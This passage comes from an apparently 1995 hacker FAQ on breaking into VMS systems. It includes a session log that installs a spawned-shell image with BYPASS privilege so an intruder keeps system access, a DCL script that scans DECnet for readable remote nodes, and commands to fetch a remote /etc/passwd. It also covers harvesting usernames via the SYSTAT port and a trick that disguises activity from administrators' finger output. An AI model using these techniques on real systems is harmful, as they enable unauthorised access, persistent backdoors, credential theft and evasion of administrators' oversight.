is reserved for enhanced security products like SEVMS.
VOLPRO - Lets user's processes:
o Initialize a previously used volume with an owner
UIC different from the user's own UIC.
o Override the expiration date on a tape or
disk owned by another user.
o Use the ////FOREIGN qualifier to mount a Files-11
volume owned by another user.
o Override the owner UIC protection of volume.
WORLD - Lets user's process affect (suspend, resume, delete,
set priority, wake, etc) other processes both inside
and outside its group.
- Taken Mostly From the, "OpenVMS VAX
System Security" (V6.0)
2. "How can I make a SUID Shell in VMS"....
Simple... You can't. Privileges are handled in a much different
method than on Unix (see "How are user privileges setup"). You
can make a program (image) that when executed, the process
of that image gains the privileges that it was "installed"
with. For example, if you write a program that needs read access
to the SYSUAF.DAT you *could* make SYSUAF.DAT world readable
(if you are on a privileged account, of course) but this
would be very, very unwise. Another method would be to
"INSTALL" the executable image and give it READALL privileges,
so that when a user's processes calls your programs, that programs
process (the image running) gets READALL privileges. Then that
process would be able to read the SYSUAF.DAT, but the user's
process would not.
With this in mind, it is possible to create a senerio similar
to that of a "SUID Shell" (but without the shell). The idea
is to give the privileges (that you want to keep ahold of)
on a program that does nothing more than make a call to
LIB$SPAWN. The idea is to write a program that will do nothing
more than create another process (that drops you to DCL)
via LIB$SPAWN, and using the VMS "INSTALL" utility, give it
the privileges that you wish that process to have. There are
several downfalls to this. To accomplish this, you would
need CMKRNL privileges yourself (your process). So your process
would already need certain privileges to pull this off. The idea
here is in the event that the user has obtained a "privileged
account", and wishes to remain privileged, he/she could
install a image which could be called by a normal (non-privileged)
user in which he/she could obtain the system privileges again.
Below is a sample session capture of me installing a privileged
image. The privilege I gave this image is "BYPASS" (Bypass
all security features, and the ability to modify SYSUAF.DAT
Connected to UpperDck
Escape character is '^]'.
Upper-Dck VMS Development System
Username: SYSTEM ! Login to our privileged account
Welcome to VAX/VMS version V5.2 on node UPPERDCK
Last interactive login on Friday, 6-JAN-1995 07:17
Last non-interactive login on Thursday, 22-DEC-1994 15:51
User= SYSTEM Directory= [SYSMGR] UIC= [1,4]
Terminal= NTY5: 6-JAN-1995 07:19:01.00
sysm>basic ! I am going to use VMS BASIC, but use anything you want
10 external long function lib$spawn ! Call "SPAWN" library. The idea with this
declare long xspawn ! program is to give us another "spawned"
xspawn=lib$spawn() ! process.
save mytrap ! Save this program
exit ! and exit the VMS BASIC.
sysm>basic mytrap*.* ! Just to show our file.
Total of 1 file.
sysm>basic mytrap ! This will compile and make our object code
sysm>dir mytrap*.* ! To show our object code.
Total of 2 files.
sysm>link mytrap/notraceback ! Link it, with notraceback (for priv reasons)
sysm>dir mytrap*.* ! To show our executeable code.
Total of 3 files.
sysm>copy mytrap.exe sys$system: ! copy it to sys$system: [this is silly]
sysm>install ! Run install to setup priv's on our imagine.
INSTALL> create mytrap/priv=(bypass) ! Give "mytrap" bypass priv's
INSTALL> list mytrap/full ! Just to show off the image priv's
Entry access count = 0
Privileges = BYPASS
INSTALL> exit ! Get the hell out of here.
sysm>dir sys$system:mytrap.exe ! And just to show its still there
Total of 2 files.
sysm>dir sys$system:mytrap.exe;2 /full ! Notice "world" protections...
MYTRAP.EXE;2 File ID: (43314,33,0)
Size: 4/6 Owner: [1,4]
Created: 6-JAN-1995 07:20:26.35
Revised: 6-JAN-1995 07:20:41.54 (2)
Expires: <None specified>
Backup: <No backup recorded>
File organization: Sequential
File attributes: Allocation: 6, Extend: 0, Global buffer count: 0
No version limit, Contiguous best try
Record format: Fixed length 512 byte records
Record attributes: None
RMS attributes: None
Journaling enabled: None
File protection: System:RWED, Owner:RWED, Group:RE, World:
Access Cntrl List: None
sysm>set file sys$system:mytrap.exe /protection=(w:re) ! because world cant
sysm>log ! read/execute. Logout.
SYSTEM logged out at 6-JAN-1995 07:42:02.55
Connection closed by foreign host.
[Now, we make a new connection to the system to test our ]
[ "MYTRAP.EXE" with the image priv's attached to it ]
Connected to UpperDck.
Escape character is '^]'.
Upper-Dck VMS Development System
Username: JOEBOB ! Now, log as a normal user.
Welcome to VAX/VMS version V5.2 on node UPPERDCK
Last interactive login on Friday, 6-JAN-1995 07:14
User= JOEBOB Directory= [UPPERDCK] UIC= [130,163]
Terminal= NTY6: 6-JAN-1995 07:42:12.00
UPDCK> show process/priv ! To prove that we have normal user priv's
6-JAN-1995 07:42:27.01 User: JOEBOB Process ID: 0000010F
Node: UPPERDCK Process name: "JOEBOB"
Process privileges:
TMPMBX may create temporary mailbox
NETMBX may create network device
Process rights identifiers:
UPDCK> set proc/priv=bypass ! To prove I can't enabled "BYPASS" priv's
%SYSTEM-W-NOTALLPRIV, not all requested privileges authorized
UPDCK> mcr mytrap ! Run our little "privledge provider"
UPDCK> show process/priv ! To show our priv's after we exec. MYTRAP.EXE
! note that we are spawned (see PID and Proc. Name)
6-JAN-1995 07:42:46.05 User: JOEBOB Process ID: 00000110
Node: UPPERDCK Process name: "JOJBOB_1"
Process privileges:
TMPMBX may create temporary mailbox
NETMBX may create network device
Process rights identifiers:
UPDCK> set process/priv=bypass ! Note, no error when we do this now.
UPDCK> show process/priv ! To prove that we have gained BYPASS
6-JAN-1995 07:42:53.37 User: JOEBOB Process ID: 00000110
Node: UPPERDCK Process name: "JOEBOB_1"
Process privileges:
TMPMBX may create temporary mailbox
NETMBX may create network device
BYPASS bypasses UIC checking
Process rights identifiers:
UPDCK> logout ! I can pretty much do anything now.... Lets stop this subprocess
Process JOEBOB_1 logged out at 6-JAN-1995 07:42:59.01
UPDCK> logout ! logout completely
JOEBOB logged out at 6-JAN-1995 07:43:05.11
Connection closed by foreign host.
- Using DECNetwork's to your advantage. -
1. "What is a DECNet?"
"DECNet is a collective name for the family of communications products
(software and hardware) that allow DIGITAL operating systems to participate
in a network.
"A DECNet network links computers into flexible configurations to exchange
information, share resources, and perform distributed processing. DECNet
distribution processing capabitlites also information to be originated
anywhere in the network."
- VMS Version 5.0 DECnet "Guide to DECNet - VAX Networking"
DECNet can support a minimum of 2 nodes and up to 64,000 nodes,
and can support multiple OS's along with various LAN/WAN
(Using PSI, and DECNet system can be supported on packet
switching enviroments (like Tymnet and Sprintnet)) and
operating environments. (VMS, Ultrix, RSX, and with the correct
hardware, IBM PC's, VAXmate's, etc).
DECNet's allow easy access to information from system to system.
2. "This is great, what does it mean to me."
You can use DECNets to grab information/files/programs and use
them to your own advantage (granted that security has not
been completely implemented... which is usually the case
on a vanilla/default install)
For instance, if a intruder where to break into a system
which supported a DECNet, he/she might be able to access files on
a remote system/nodes of that DECNet. As stated, DECNets
can range from local machines in that area (LAN) or
DECNet's can stretch across the world.
3. "How would I get to that information on a remote node?"
All from DCL, using commands like "DIRECTORY", "COPY",
"TYPE", etc. Usually by adding in the node name at the
being of the command. For example
$ DIR NODE:: ! Example format.
! Directory on the remote node.
$ COPY NODE::DISK1:[BOB]SECRET.TXT [] ! The "[]" means "wherever i am"
4. "What if I want to connect and use the nodes interactively?".
One of two ways. Try to "SET HOST [NODENAME]". If that fails,
try to use NCP (Network Control Program), like this.....
5. "Well, Gee, thats wonderful. How do I find connectable nodes
that are on the DECNet"
Once again, this information can be found using the NCP (
or via a "SHOW NETWORK") command. You might not get a
*complete* listing, because the host you are on might not
know all DECNet nodes, but it will at least get you hoping
around on the DECNet. This list can be obtain via executing.....
This will dump a list. You can sort though the information
using the NCP connect command, and see what all sorts
of things you run into (Xyplex/DECServers, Other VMS Machines,
SNA Gateway controls, etc, etc). If you are only interested
in machine that you can get file information on, you can
us the following command file to find nodes that you can
$! DECNETFIND Version 1.0
$! Coded By The Beaver
$! Jan 5th, 1995
$! The intent of this code is to scan for remote, connectable nodes that
$! the VMS host knows about (Via NCP) and build a list. Once this list
$! has been created, we check to see if the remote machine is indeed
$! A> VMS (Later rev. will include Ultrix/OSF(?)) 2> Can it be directly
$! accessed via the DECNet 3> Can we read file systems on the remote node.
$! Node that are "successful" are stored away. This prevents mucho
$! time consuming scanning by hand.
$ on error then goto err ! In case of Boo-Boo
$ say :== write sys$output
$ if p1 .eqs. "" ! Yes, output file helps
$ then
$ say "DECNet VMS Node Finder Version 1.0 1995"
$ say "Coded By The Beaver"
$ say ""
$ say "Usage:"
$ say "DECNETFIND [Outfile]"
$ exit
$ endif
$ say "Building Node List Via NCP....(Working)"
$ mcr ncp show known nodes to nodes.out ! Fire up NCP and dump nodeslist
$ open/read in nodes.out ! Open to read
$ open/write nodelist 'p1' ! "Success" Storage area.
$ on severe_error then continue ! So things done die on "dir ::"'s
$ loop1:
$ read/end = end in line
$ name=f$element(0,")", f$element(1, "(", line)) ! grab a nodename
$ if name .gts. "("
$ then
$ say "**************************************************************"
$ say "Nodename: "+name
$ say ""
$ dir 'name':: ! See if we can get to it via a DECNet DIR::
$ if $severity .nes "1"
$ then
$ say "Status: Node Unreachable Via DECNet Dir::"
$ else
$ say "Status: Found Good Node. [Logged]"
$ write nodelist name ! Log it.
$ endif
$ endif
$ goto loop1
$ err:
$ say "Ouch. There has been a error!"
$ end:
$ close in
$ close nodelist ! Close up and leave, exit stage
$ delete nodes.out;* ! right
$ say "Complete!"
$ exit
"That works great, but I ran into a Unix (Ultrix) machine, and
when I do a 'DIR NODENAME::' it only gives me some jerk-off's
directory. Is there anyway I can grab files off the remote machine
(Ultrix) and directory listings?"
Once again, no problem. Format the command like this:
$ DIR NODE::"/etc" ! will give remote nodes /etc directory
Or to grab the /etc/passwd file on the remote node, try....
$ TYPE NODE::"/etc/passwd" ! And open a capture buffer.
6. "Can't DECNet's be protected more against this generic attack?"
Sure, by setting up proxy login access, which forces the
users to supply a password when attempting to do network
operations like above. Proxy logins are formatted below:
(This example is using the DCL COPY command)
COPY remotenode"proxyaccount"::filename filename
for example,
(BOB - The Proxy login name, FLASHER2 is the password)
However, in a vannila VMS (IE - Default installation),
proxy logins are not enabled, so DECNet surfing can
prove to be very, very useful.
7. "Are proxy logins logged.. Can I write a routine that will
attempt proxy accounts to break into remote machines?"
You bet that proxy logins are logged. Repeating invalid
attempts will inform the administrations that a "NETWORK
BREAK IN" is in effect (via the OPCOM process).
- TCP/IP Networked Machines -
1. "I have found a remote VMS machines on a TCP/IP network (I.E.
the internet). I have tried to finger the remote system in
order to start collecting usernames, I get a 'connection
refused'.... Now what?"
Connect to the SYSTAT port (Port 11). This will give jobs
currently running on the system. More than likely, this
port has been left open. With this in mind, you can
sort though all the jobs and grab usernames, while excluding
Also, I find one great trick is to look for "Student" type
accounts. That is, accounts that appear to be repetitive.
You can then predict possible usernames.
The above can be accomplisted by using the below command
(In most cases):
2. "On Unix machines, I can make a symbolic link to a 'questionable'
command, so that is appears that I am doing one thing when
I am really doing another (Or copying and renaming the command).
Is there anyway I can make it appear that I am doing something
that I am not?".
When the command "FINGER" is issued, a user/administrator
can see what image is currently being executed by a particular
user. For example sake, lets say you want to play with
NCP but you know that if the administrators see you in NCP,
they will get rather irate, and kick you off the system.
You can make it appear that you are doing something else
a> Copying the image, renaming it, and running it. [which
may or may not work].
b> Write a routine that calls LIB$SPAWN named the command
you wish to appear to be executing, thus making it
appear via finger that you are executing another command.
Below is a quick example session to examine of senerio b. :
-----------------------<Begin Log Of Session>------------------------------
Connected to UpperDck.
Escape character is '^]'.
UpperDck VMS Development System
Username: JOEUSER
Welcome to VAX/VMS version V5.2 on node UPPERDCK
Last interactive login on Friday, 20-JAN-1995 12:58
Terminal= NTY12: 20-JAN-1995 13:00:16.93
$ create mail.bas
10 external long function lib$spawn ! Create a program that calls LIB$SPAWN
declare long xspawn ! This can be coded in anything you
xspawn=lib$spawn() ! want
$ basic mail ! Compile out LIB$SPAWN program
$ link mail ! Link it.
$ finger ! Show what we look like before we run it
20 JAN 13:02:06 Up 28 21:15:12
2+0 Jobs Load ave 0.07 0.03 0.01
Login Name Job Subsys TTY Idle Net Site
OPER Operations 0013a GLYPH nty9 40 OPSITE
$ run mail ! Makes us appear as if we are in the "MAIL" utility.
$ finger ! Take a look'see
20 JAN 13:02:15 Up 28 21:15:21
2+0 Jobs Load ave 0.07 0.03 0.01
Login Name Job Subsys TTY Idle Net Site
OPER Operations 0013a GLYPH nty9 40 OPSITE
$ log ! Stop the subprocess
Process JOEUSER_1 logged out at 20-JAN-1995 13:02:20.02
$ log ! logout
JOEUSER logged out at 20-JAN-1995 13:02:22.32
-----------------------------<End Of Log>--------------------------------
Finnal Notes:
This FAQ is far from complete, and will remain in its "beta"
stages for sometime.
I am sure that many people while question the fact of the us
of VMS BASIC as opposed to C. The reason that some examples
where given with VMS BASIC is because of a lack of a C compiler
on our local machine. Besides, it gets the job done
I was mailed many terminal spoofing programs, but since the
range on these can be so large, and its one of the most
common VMS hack's, I will wait until the next release of this
FAQ until a good terminal spoofing is released with this
(Anyone ever thought of grabbing the SYS$ANNOUNCE to emulate
the login screen??).
I got alot of mail from alot of people.
Thanks to Shadow Hacker, Risc, Trouser, Spoon, and
all the boys at The Upper-Deck.
Bitwarrier for intresting conversation (besides terminal
spoofing), the ton of people that mailed me. Thanks.
- Things that need to be added/updates:
Identifying VMS machines.....
Information on the OPCOM process....
Information on accounting/user tracking...
A decent terminal spoof program
- This that we are looking for [Please mail beaver@upperdck.blkbox.
com, if you know about these hack's]
VMS Phone mail recording facility (Uses undocumented routines
found in the PHONE.EXE command)
Passing commands via VMS mail.
If you have anything remotely intresting for the next release,
please mail them to me at:
"It ain't done, but hey... It a fucking start......"